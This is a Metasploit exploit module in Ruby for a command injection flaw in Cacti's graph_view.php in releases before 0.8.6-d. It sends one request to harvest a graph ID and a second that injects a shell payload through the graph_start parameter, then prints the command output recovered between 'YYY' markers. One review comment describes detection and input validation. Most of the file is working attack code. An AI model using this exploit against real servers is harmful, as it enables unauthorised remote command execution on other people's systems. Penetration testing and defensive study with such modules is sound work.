
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the command execution flaw in Raxnet Cacti's
# 'graph_view.php'. Per the module description, every Cacti release prior to
# 0.8.6-d is affected, so running 0.8.6-d or later is the remediation the
# metadata points to.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (name, references, payload constraints,
  # platform) and the single user-facing option, URI.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    # Payload constraints: command-style payloads only, at most 512 bytes,
    # no NOP padding.
    payload_constraints = {
      'DisableNops' => true,
      'Space' => 512,
      'Compat' => {
        'PayloadType' => 'cmd',
        'RequiredCmd' => 'generic perl ruby python telnet',
      }
    }

    super(
      update_info(
        info,
        'Name' => 'Cacti graph_view.php Remote Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in the
          Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to
          0.8.6-d are vulnerable.
        },
        'Author' => [ 'David Maciejak <david.maciejak[at]kyxar.fr>', 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '17539' ],
          [ 'BID', '14042' ],
        ],
        # The resulting session is not expected to be privileged.
        'Privileged' => false,
        'Payload' => payload_constraints,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', { }]],
        'DisclosureDate' => '2005-01-15',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
      ]
    )
  end

  # Sends two GET requests to the configured graph_view.php path: one with
  # action=list to read a graph ID out of the returned page, then one that
  # places a shell command line in the graph_start parameter. Output is
  # recovered from the response body between two literal "YYY" markers.
  #
  # NOTE(review): graph_start presumably carries a numeric value in normal
  # use - confirm against the Cacti source. If so, a graph_start that is not
  # purely numeric (here it contains newlines and ';') is the anomaly to
  # alert on in request logs, and integer validation of that parameter is
  # the server-side control that closes this input path.
  def exploit
    script_path = normalize_uri(datastore['URI'])

    # Request 1 (10 s timeout): fetch the graph listing to learn a graph ID.
    listing = send_request_cgi(
      {
        'uri' => script_path,
        'vars_get' => { 'action' => 'list' }
      },
      10
    )

    unless listing
      print_error("The server gave no response")
      return
    end

    # The first local_graph_id=...& occurrence in the page supplies the ID.
    graph_ref = listing.body.match(/local_graph_id=(.*?)&/)
    unless graph_ref
      print_error("Could not locate a valid image ID")
      return
    end

    # Request 2 (25 s timeout): the encoded payload is wrapped in
    # "echo YYY" markers so its output can be located in the response.
    reply = send_request_cgi(
      {
        'uri' => script_path,
        'vars_get' => {
          'local_graph_id' => graph_ref[1],
          'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n"
        }
      },
      25
    )

    return print_status("No response from the server") unless reply

    print_status("The server returned: #{reply.code} #{reply.message}")
    print("")

    # Absence of the markers is reported as "may not be vulnerable".
    echoed = reply.body.match(/YYY(.*)YYY/)
    if echoed
      print_status("Command output from the server:")
      print(echoed[1])
    else
      print_status("This server may not be vulnerable")
    end
  end
end